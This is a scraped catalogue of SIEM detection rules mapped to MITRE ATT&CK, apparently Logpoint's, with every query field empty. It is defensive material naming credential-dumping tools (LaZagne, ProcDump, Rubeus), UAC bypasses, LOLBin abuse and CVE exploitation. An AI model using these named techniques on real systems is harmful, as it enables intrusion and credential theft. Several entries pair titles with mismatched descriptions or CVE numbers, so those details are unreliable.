Trigger Condition: A failed login attempt followed by account lockout is detected.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts, Exploitation for Credential Access, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Brute Force
ATT&CK ID: T1078, T1212, T1068, T1211 ,T1110
Minimum Log Source Requirement: Windows
Query:
LP_Windows Local User Management
Trigger Condition: A user is created on a non-domain controller. For the alert to work, you must update the list DOMAIN with domain controllers.
ATT&CK Category: Persistence
ATT&CK Tag: Create Account, Local Account
ATT&CK ID: T1136, T1136.001
Minimum Log Source Requirement: Windows
Query:
LP_WMI DLL Loaded by Office
Trigger Condition: Loading of DLLs related to WMI by Office products signaling VBA macros executing WMI Commands.
ATT&CK Category: Execution
ATT&CK Tag: User Execution, Malicious File
ATT&CK ID: T1204, T1204.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Windows Registry Persistence COM Key Linking Detected
Trigger Condition: COM object hijacking via TreatAs subkey is detected. It is rare, but there are some cases where system utilities use linking keys for backward compatibility.
ATT&CK Category: Privilege Escalation, Persistence
ATT&CK Tag: Event Triggered Execution, Component Object Model Hijacking
ATT&CK ID: T1546, T1546.015
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Windows Shell Spawning Suspicious Program
Trigger Condition: A suspicious child process of Windows Shell and scripting processes such as Wscript, Rundll32, Regsvr32, powershell and Mshta is detected.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: PowerShell, Visual Basic, System Binary Proxy Execution
ATT&CK ID: T1059.001, T1059.005, T1218
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Windows User Account Change to End with Dollar Sign
Trigger Condition: A user account is changed to end with the dollar sign ($).
ATT&CK Category: Persistence
ATT&CK Tag: Account Manipulation
ATT&CK ID: T1098
Minimum Log Source Requirement: Windows
Query:
LP_Windows Webshell Creation Detected
Trigger Condition: Creation of WebShell file on a static web site. The alert has been directly translated from sigma rule.
ATT&CK Category: Persistence
ATT&CK Tag: Server Software Component, Web Shell
ATT&CK ID: T1505, T1505.003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Winlogon Helper DLL
Trigger Condition: Modification of registry entries related to winlogon.exe to load and execute possible malicious DLLs and/or executables is detected.
ATT&CK Category: Persistence
ATT&CK Tag: Boot or Logon Autostart Execution, Winlogon Helper DLL
ATT&CK ID: T1547, T1547.004
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_WMI Backdoor Exchange Transport Agent
Trigger Condition: WMI backdoor in Exchange Server Software Component and Transport Agents via WMi event filters is detected.
ATT&CK Category: Privilege Escalation, Persistence
ATT&CK Tag: Event Triggered Execution, Windows Management Instrumentation Event Subscription
ATT&CK ID: T1546, T1546.003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_WMI Modules Loaded by Suspicious Process
Trigger Condition: Loading of WMI modules by suspicious processes like a binary from ProgramData. Legitimate system processes and third-party utilities extensively use WMI. We recommend you whitelist to reduce false positive flooding. Also, do not monitor C:Windows* as extensive whitelisting is required, which may hamper query’s performance.
ATT&CK Category: Execution
ATT&CK Tag: Windows Management Instrumentation
ATT&CK ID: T1047
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_WMI Persistence - Script Event Consumer File Write
Trigger Condition: File writes of WMI script event consumer are detected.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: Event Triggered Execution, Windows Management Instrumentation Event Subscription
ATT&CK ID: T1546, T1546.003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Wsreset UAC Bypass Detected
Trigger Condition: A method that uses the Wsreset.exe tool to reset the Windows Store bypassing UAC is detected.
ATT&CK Category: Privilege Escalation, Defense Evasion
ATT&CK Tag: Abuse Elevation Control Mechanism, Bypass User Access Control
ATT&CK ID: T1548, T1548.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_ZOHO Dctask64 Process Injection Detected
Trigger Condition: This alert is triggered whenever it detects suspicious process injection using ZOHO’s dctask64.exe.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Process Injection
ATT&CK ID: T1055
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_APT 34 Initial Access Using Spearphishing Link Detected
Trigger Condition: Entry vectors try to gain their initial foothold within a network using Spearphishing link with IOCs’ attacks related to APT34. For the alert to work, it uses lists; IRANIAN_SPEARPHISHING_DOMAINS and IRANIAN_SPEARPHISHING_IP.
ATT&CK Category: Initial Access
ATT&CK Tag: Spearphishing Link
ATT&CK ID: T1566
Minimum Log Source Requirement: EmailServer
Query:
LP_Suspicious File Deletion Detected
Trigger Condition: Adversaries remove trail files for an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. For the alert to work, you must configure ACLs on paths and extensions you want to monitor for deletion operations.
ATT&CK Category: Defense Evasion
ATT&CK Tag: File Deletion
ATT&CK ID: T1070.004
Minimum Log Source Requirement: Windows
Query:
LP_Security Software Discovery Process Detected
Trigger Condition: Adversaries attempts to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system.
ATT&CK Category: Discovery
ATT&CK Tag: Security Software Discovery
ATT&CK ID: T1518
Minimum Log Source Requirement: Windows
Query:
LP_System Network Connections Discovery
Trigger Condition: This alert is triggered whenever the discovery of network connections via system utilities like netstat, net, etc is detected.
ATT&CK Category: Discovery
ATT&CK Tag: System Network Connections Discovery
ATT&CK ID: T1049
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Exfiltration over Cloud Application Detected
Trigger Condition: Adversaries performs data exfiltration with a different protocol from the main Command and Control protocol or channel.
ATT&CK Category: Exfiltration
ATT&CK Tag: Exfiltration Over Alternative Protocol
ATT&CK ID: T1048
Minimum Log Source Requirement: ProxyServer
Query:
LP_Remote File Copy Detected
Trigger Condition: Files are copied from one system to another to stage adversary tools or other files throughout an operation.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Remote File Copy
ATT&CK ID: T1105
Minimum Log Source Requirement: Windows
Query:
LP_Privilege Escalation - Bypassing User Account Control Detected
Trigger Condition: Adversaries uses techniques to elevate a user’s privileges manipulating UAC to administer if the target process is unprotected.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: Bypass User Account Control
ATT&CK ID: T1548
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Process Execution from Suspicious Location
Trigger Condition: Execution of a process from suspicious location.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Active Directory Enumeration via ADFind
Trigger Condition: Enumeration of Active Directory using the ADfind tool. AdFind is a CLI-based utility that can be used for gathering information from Active Directory like organizational units, users, computers, and groups. Adversaries can use this utility to gather information related to the Active Directory.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Possible Command Prompt Process Hollowing
Trigger Condition: Possible process hollowing of the command prompt is detected using applications like net.exe, nltest.exe or ipfconfig. Adversaries injects malicious code into suspended and hollowed processes to evade process-based defenses.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Process Injection, Process Hollowing
ATT&CK ID: T1055, T1055.012
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Taskkill Activity
Trigger Condition: Multiple processes terminated in a short time via taskkill command that may signal malicious activity like ransomware.
ATT&CK Category: Impact
ATT&CK Tag: Service Stop
ATT&CK ID: T1489
Minimum Log Source Requirement: Windows
Query:
LP_Ryuk Wake-On-LAN Activity
Trigger Condition: Ryuks Wake-On-LAN activity is detected.
Minimum Log Source Requirement: Windows
Query:
LP_EXE or DLL Dropped in Perflogs Folder
Trigger Condition: The EXE or DLL file is dropped in Windows’s Perflog directory.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Credential Access via LaZagne
Trigger Condition: Credential accessed via the popular open-source LaZagne tool.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, LSASS Memory
ATT&CK ID: T1003,T1003.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_RDP Connection Inititated from Domain Controller
Trigger Condition: Initiation of RDP connection from a domain controller.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Remote Services, Remote Desktop Protocol
ATT&CK ID: T1021, T1021.001
Minimum Log Source Requirement: Windows
Query:
LP_Active Directory Module Load in PowerShell
Trigger Condition: Active Directory module is loaded via PowerShell.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows, PowerShell
Query:
LP_Possible Active Directory Enumeration via AD Module
Trigger Condition: Command related to retrieving the last logon date of a computer in an Active Directory (AD).
ATT&CK Category: Execution, Discovery
ATT&CK Tag: Remote System Discovery, Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1018, T1059, T1059.001
Minimum Log Source Requirement: Windows, PowerShell
Query:
LP_Microsoft Defender Disabling Attempt via PowerShell
Trigger Condition: Attempt to disable Microsoft Defender via PowerShell.
ATT&CK Category: Defense Evasion, Execution
ATT&CK Tag: Impair Defenses, Disable or Modify Tools, Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1562, T1562.001, T1059, T1059.001
Minimum Log Source Requirement: Windows, PowerShell
Query:
LP_Possible Kerberoasting via Rubeus
Trigger Condition: Kerberoasting attack via popular open-source tool Rubeus.
ATT&CK Category: Credential Access
ATT&CK Tag: Steal or Forge Kerberos Tickets, Kerberoasting
ATT&CK ID: T1558, T1558.003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Scheduled Task Creation
Trigger Condition: Creation of a suspicious scheduled task in a Windows endpoint. Adversaries may abuse the Windows Task Scheduler to perform task scheduling for the initial or recurring execution of malicious code to achieve persistence, lateral movement, execution, detection evasion, and privilege escalation. Also, it is prevalent among ransomware to use public directories for scheduled task creation.
ATT&CK Category: Persistence
ATT&CK Tag: Scheduled Task
ATT&CK ID: T1053.005
Minimum Log Source Requirement: Windows
Query:
LP_RDP Connection Inititated from Suspicious Country
Trigger Condition: Initiation of RDP connection from a domain controller is detected.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts, Domain Accounts
ATT&CK ID: T1078, T1078.002
Minimum Log Source Requirement: Windows
Query:
LP_Scheduled Task Deletion
Trigger Condition: Deletion of a scheduled task using schtasks utility with delete command is detected.
ATT&CK Category: Execution
ATT&CK Tag: Scheduled Task
ATT&CK ID: T1053.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Exchange Remote Code Execution CVE-2020-0688 Attempt
Trigger Condition: A remote code execution attempt via CVE-2020-0688 in Microsoft Exchange is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: External Remote Services
ATT&CK ID: T1133
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_BlueKeep Vulnerability CVE-2019-0708 Exploitation
Trigger Condition: The exploitation of BlueKeep, a remote desktop services remote code execution vulnerability, also known as CVE-2019-0708 is detected.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Exploitation of Remote Services
ATT&CK ID: T1210
Minimum Log Source Requirement: IDS/IPS
Query:
LP_ZoHo ManageEngine Pre-Auth File Upload CVE-2019-8394 Exploitation Attempt
Trigger Condition: A pre-auth file upload vulnerability CVE-2019-8394 in ZoHo ManageEngine ServiceDesk Plus is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_ZoHo ManageEngine Desktop Central CVE-2020-10189 Exploitation Attempt
Trigger Condition: A remote code execution attempt via CVE-2019-11580 in ZoHo ManageEngine Desktop Central is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_Fortinet Pre-Auth File Read CVE-2018-13379 Exploitation Attempt
Trigger Condition: The exploitation of pre-auth file read vulnerability (2018-13379) in Fortinet FortiOS is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: External Remote Services
ATT&CK ID: T1133
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_Adobe ColdFusion Remote Code Execution CVE-2018-15961 Attempt
Trigger Condition: The exploitation of arbitrary file upload vulnerability (CVE-2018-15961) to upload JSP webshell for remote code execution in Adobe ColdFusion is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_Default Hard disk Usage Status
Trigger Condition: The hard disk uses storage greater than or equal to 80%.
Minimum Log Source Requirement: Logpoint
Query:
LP_Default License Grace State
Trigger Condition: Logpoint’s license has expired and is operating in grace state.
Minimum Log Source Requirement: Logpoint
Query:
LP_Default License Invalid
Trigger Condition: ‘s license is no longer valid.
Minimum Log Source Requirement:
Query:
LP_Microsoft Build Engine Loading Credential Libraries
Trigger Condition: Loading of credential libraries such as vaultcli.dll and SAMLib.dll by MS Build engine is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, Security Account Manager
ATT&CK ID: T1003, T1003.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Potential Phishing Attack Detected
Trigger Condition: Phishing attack is detected
ATT&CK Category: Initial Access
ATT&CK Tag: Phishing, Spearphishing Attachment
ATT&CK ID: T1566, T1566.001
Minimum Log Source Requirement: MailServer
Query:
LP_Safe DLL Search Mode Disabled
Trigger Condition: Safe DLL search mode is disabled.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Windows
Query:
LP_Potential Intrusion Detected
Trigger Condition: An intrusion by IDS or IPS devices is detected.
ATT&CK Category: Command and Control, Defense Evasion
ATT&CK Tag: Proxy, Exploitation for Defense Evasion
ATT&CK ID: T1090, T1211
Minimum Log Source Requirement: -
Query:
LP_Windows Crash Dump Disabled
Trigger Condition: Windows’s crash dump registry setting is disabled.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Shells Spawn by SQL Server
Trigger Condition: Suspicious shell process spawned by the SQL Server process which may indicate exploitation of a vulnerability.
ATT&CK Category: Initial Access, Execution
ATT&CK Tag: Exploit Public-Facing Application, PowerShell
ATT&CK ID: T1190, T1059.001
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Microsoft SQL Server PowerShell Module Use Detected
Trigger Condition: This alert detects the execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_UltraVNC Execution via Command Line
Trigger Condition: Execution of UltraVNC via the command line. Gamaredon is known to use this technique to gain remote access.
ATT&CK Category: Command and Control
ATT&CK Tag: Remote Access Software
ATT&CK ID: T1219
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Office Security Settings Changed
Trigger Condition: Modification of Microsoft Office security settings in the registry.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Microsoft Defender AMSI Trigger
Trigger Condition: Triggering of Microsoft Defender with AMSI as the detection source. AMSI is agnostic of antimalware vendors and is designed to allow for the most common malware scanning and protection techniques.
Minimum Log Source Requirement: Windows
Query:
LP_Actinium IoC Domains Detected
Trigger Condition: When any Actinium IoC domain match is found. IoC Reference: Hashes are latest up to Feb 2022.
Minimum Log Source Requirement: IDS, IPS, Firewall
Query:
LP_Impacket PsExec Execution
Trigger Condition: Execution of Impacket’s PsExec utility. Impacket is a collection of Python classes that work with network protocols. It is focused on providing low-level programmatic access to the packets and is commonly used in PoCs.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Lateral Tool Transfer
ATT&CK ID: T1570
Minimum Log Source Requirement: Windows
Query:
LP_Oracle WebLogic CVE-2021-2109 Exploitation
Trigger Condition: Possible exploitation of the Oracle WebLogic server vulnerability CVE-2021-2109 is detected. This vulnerability allows a high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_PowerView PowerShell Commandlets
Trigger Condition: Execution of PowerShell commandlets of the popular PowerView module of the PowerSploit framework is detected. For the alert to work, the script block logging must be enabled.
ATT&CK Category: Execution
ATT&CK Tag: T1059 - Command and Scripting Interpreter, T1059.001 - PowerShell
Minimum Log Source Requirement: Windows
Query:
LP_Stealthy VSTO Persistence
Trigger Condition: Modification of office products Addins and VSTO inclusion registry keys. By modifying the registry keys adversaries can execute their payload through a malicious addins. Registry Auditing is required.
ATT&CK Category: Persistence
ATT&CK Tag: Add-ins, Office Application Startup
ATT&CK ID: T1137.006, T1137
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious VMToolsd Child Process
Trigger Condition: Creation of suspicious child process VMware Tools process, which may indicate persistence set up by attackers.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter
ATT&CK ID: T1059
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious WMPRVSE Child Process
Trigger Condition: This alert is triggered whenever an uncommon or suspicious child process of the legitimate Windows Management Instrumentation Provider Service is detected. Attackers may leverage WMI (Windows Management Instrumentation) to execute commands and perform various tasks like evade detection or bypass security controls on a target system.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: Windows Management Instrumentation, Malicious File, Regsvr32
ATT&CK ID: T1047, T1204.002, T1218.010
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_VMware VSphere CVE-2021-21972 Exploitation
Trigger Condition: The exploitation of VSphere Remote Code Execution vulnerability CVE-2021-21972 is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: T1190 - Exploit Public-Facing Application
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_Zoho ManageEngine ADSelfService Plus CVE-2021-40539 Exploitation
Trigger Condition: The REST API authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus (v6113 and prior) is detected. For the detection to work, Administrators must fetch logs from the
\ManageEngine\ADSelfService Plus\logspath.ATT&CK Category: Initial Access, Persistence
ATT&CK Tag: Exploit Public-Facing Application, Web Shell
ATT&CK ID: T1190, T1505.003
Minimum Log Source Requirement: Web Server
Query:
LP_Possible Access to ADMIN Share
Trigger Condition: Access to $ADMIN share that may help detect lateral movement attempts. Since Windows Admin Share activity is so common, it provides adversaries with a powerful, discreet way to move laterally within an environment. Legitimate administrative activities may generate false positives and will require whitelisting.
ATT&CK Category: Lateral Movement
ATT&CK Tag: SMB/Windows Admin Shares
ATT&CK ID: T1021.002
Minimum Log Source Requirement: Windows
Query:
LP_PsExec Tool Execution Detected
Trigger Condition: PsExec service installation and execution events (service and Sysmon) are detected.
ATT&CK Category: Execution
ATT&CK Tag: System Services, Service Execution
ATT&CK ID: T1569, T1569.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Screensaver Activities Detected
Trigger Condition: Adversaries’s modification of registry key containing the path to binary used as screensaver executable is detected to establish persistence.
ATT&CK Category: Persistence
ATT&CK Tag: T1546 - Event Triggered Execution, T1546.002 - Screensaver
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspect Svchost Activity Detected
Trigger Condition: Scvhost activity is detected. It is abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
ATT&CK Category: Privilege Escalation, Defense Evasion
ATT&CK Tag: T1055 - Process Injection
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Time-Stomping of Users Directory Files Detected
Trigger Condition: Time-stomping of user directory file is detected. Sysmon can only detect a change of CreationTime and not LastWriteTime and LastAccessTime. Whitelisting legitimate noisy processes like browsers, Slack, or Teams are required to reduce false positives.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1070 - Indicator Removal on Host, T1070.006 - Timestomp
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Windows Defender Exclusion Set Detected
Trigger Condition: Added Windows Defender exclusion in the registry where an entity bypasses antivirus scanning from Windows Defender.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1562 - Impair Defenses, T1562.001 - Disable or Modify Tools
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Netsh DLL Persistence Detected
Trigger Condition: Detects persistence via Netsh Helper.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: Netsh Helper DLL
ATT&CK ID: T1546.007
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Usage of Procdump Detected
Trigger Condition: Suspicious use of the SysInternals ProcDump utility tool is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, LSASS Memory
ATT&CK ID: T1003, T1003.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Conhost Spawning Suspicious Processes
Trigger Condition: conhost.exe spawns other processes.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indirect Command Execution
ATT&CK ID: T1202
Minimum Log Source Requirement: Windows
Query:
LP_Wlrmdr Lolbin Use as Launcher
Trigger Condition: wlrmdr.exe is used to proxy launch other executables.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indirect Command Execution
ATT&CK ID: T1202
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Process Execution via Pester Detected
Trigger Condition: Execution of code via Pester.bat. The Pester is a Powershell module for testing purposes. Adversaries can use Pester.bat to execute other processes. Still, sometimes, legitimate use of a Pester for writing tests for Powershell scripts and modules could trigger false positives.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Root Certificate Installation Detected
Trigger Condition: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary-controlled web servers. This alert can detect the installation of a root certificate.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Install Root Certificate
ATT&CK ID: T1553.004
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious process spawned by FTP
Trigger Condition: Manipulation of ftp.exe to spawn a new process for file transfer. The alert detects renamed ftp.exe, ftp.exe script execution, and child processes run by ftp.exe.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: Command and Scripting Interpreter, Indirect Command Execution
ATT&CK ID: T1059, T1202
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Chromeloader Cross-Process Injection to Load Extention
Trigger Condition: Chromeloader uses process injection using PowerShell and loads the malicious extension onto chrome. This alert is triggered when this exact scenario occurs.
ATT&CK Category: Execution, Persistence, Privilege Escalation
ATT&CK Tag: Process Injection, PowerShell, Browser Extensions
ATT&CK ID: T1055, T1059.001, T1176
Minimum Log Source Requirement: Windows
Query:
LP_Proxy Execution via Explorer
Trigger Condition: When Explorer is used to proxy execution. Explorer is a Microsoft Windows GUI shell used for task-based file management systems. Adversaries uses Explorer to proxy the execution of other commands or processes, evading defense mechanisms.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indirect Command Execution
ATT&CK ID: T1202
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Root Certificate installation Detected
Trigger Condition: This alert is triggered whenever installation of a root certificate is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Install Root Certificate
ATT&CK ID: T1553.004
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Windows Logon Reminder Usage as Launcher
Trigger Condition: Manipulation of Wlrmdr to proxy launch other executables. Wlrmdr (Windows Logon Reminder) is a Microsoft Windows Binary used by Microsoft to display messages when logging in. Adversaries generally use Wlrmdr to pass parameters to ShellExecute.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indirect Command Execution
ATT&CK ID: T1202
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious File Transfer Using Replace
Trigger Condition: Replace is used to transfer (copy or download files) files. Replace.exe is a Microsoft Windows executable that allows replacing existing or adding new files in a directory if used with the /a option. Adversaries uses the replace process to silently download or copy files in the target system.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1105 - Ingress Tool Transfer
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Proxy Execution via Program Compatibility Wizard
Trigger Condition: Pcwrun process is used to initiate a proxy execution. Pcwrun is a Microsoft Windows Operating System file used to invoke Program Compatibility Troubleshooter/Wizard. Adversaries uses pcwrun to proxy the execution of other commands, processes, or executables in order to evade defense mechanisms. However, the specific focus needs to be on outlier events, for example unique counts, instead of commonly seen artifacts to prevent false positives.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218 - Signed Binary Proxy Execution
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Driver Installation via PnPUtil
Trigger Condition: Pnputil process is used to install or add drivers. PnPUtil is a Microsoft Windows process that lets an administrator perform actions on driver packages. Adversaries uses pnputil to install or add malicious drivers. Anyone who uses pnputil.exe who is not a system administrator should be investigated, even when they have system change permissions.
ATT&CK Category: Persistence
ATT&CK Tag: T1547 - Boot or Logon Autostart Execution, T1547.006 - Kernel Modules and Extensions
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Application Whitelisting Bypass via PresentationHost
Trigger Condition: Presentationhost process is used to execute browser applications. Presesntationhost is a Microsoft Windows application that enables the hosting of WPF applications in compatible browsers (including Microsoft Internet Explorer 6 and later). Adversaries uses presentationhost.exe to evade application whitelisting and execute malicious XAML Browser Application (XBAP) files.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218 - Signed Binary Proxy Execution
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious File Extraction via Expand Detected
Trigger Condition: Expand process is used for file transfer (copy or download files). Expand is a Microsoft Windows binary file provided by Microsoft that can extract one or more compressed files and retrieve them from distribution disks. Adversaries uses expand to silently download or copy files into the target system or location.
ATT&CK Category: Defense Evasion, Command and Control
ATT&CK Tag: T1105 - Ingress Tool Transfer, T1218 - Signed Binary Proxy Execution
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Use of Extrac32 Detected
Trigger Condition: This alert is triggered when a suspicious file overwrite using extrac32.exe is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Ingress Tool Transfer
ATT&CK ID: T1105
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Shell spawn via HTML Help Detected
Trigger Condition: Hh (HTML Help) spawns shell processes. Hh.exe is a Microsoft Windows executable program that allows developers to compile .chm file(s) with expanding tables of contents, shortcuts, keyword search, and pop-up topics. Adversaries uses Hh as a target for overwriting and executing their malicious commands, spawning other processes.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: T1047 - Windows Management Instrumentation, T1218.001 - Compiled HTML File
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_DLL Injection with Tracker Detected
Trigger Condition: This alert rule is triggered whenever DLL injection with tracker process is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1055.001 - Dynamic-link Library Injection
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Malicious PE Execution by Microsoft Visual Studio Debugger
Trigger Condition: Arbitrary Powershell command is executed via SyncAppvPublishingServer. VBScript files, such as SyncAppvPublishingServer.vbs, are trusted scripts, often signed with certificates. Adversaries can use SyncAppvPublishingServer.vbs to proxy execute PowerShell code.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218 - Signed Binary Proxy Execution
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_DLL loaded Via Certoc Binary Detected
Trigger Condition: DLL loading is detected using certoc binary. Certoc is Windows internal binary used to install certificates, but it also has a feature to load a DLL by LoadDll tag. Adversaries can use certoc binary to load their malicious DLL even when they don’t have the relevant access rights.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218 - Signed Binary Proxy Execution
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
Trigger Condition: This alert is triggered when aspnet_compiler is used to build a C# program natively.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1127 - Trusted Developer Utilities Proxy Execution
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Invocation PowerShell Diagnostic Script Execution
Trigger Condition: This alert detects execution of malicious payloads via SyncInvoke in CL_Invocation.ps1 module.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1216 - Signed Script Proxy Execution
Minimum Log Source Requirement: Windows
Query:
LP_Registry Configured RunOnce Task Execution
Trigger Condition: This alert gets triggered when the Run Once task executes, as configured in the registry or configuration of Run Once registry key is changed.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1112 - Modify Registry
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious WSL Bash Execution
Trigger Condition: This alert is triggered whenever it detects execution of Microsoft bash launcher with the “-c” flag.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1202 - Indirect Command Execution
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Usage of Csharp or Roslyn Csharp Interactive Console
Trigger Condition: Usage of csi and rcsi binary are detected. Adversaries can use these binaries to execute their malicious C# code.
ATT&CK Category: Execution
ATT&CK Tag: Software Deployment Tools, System Binary Proxy Execution
ATT&CK ID: T1072, T1218
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible Commandline Obfuscation Detected
Trigger Condition: This alert is triggered whenever suspicious characters are detected in the command indicating possible obfuscation of commands.
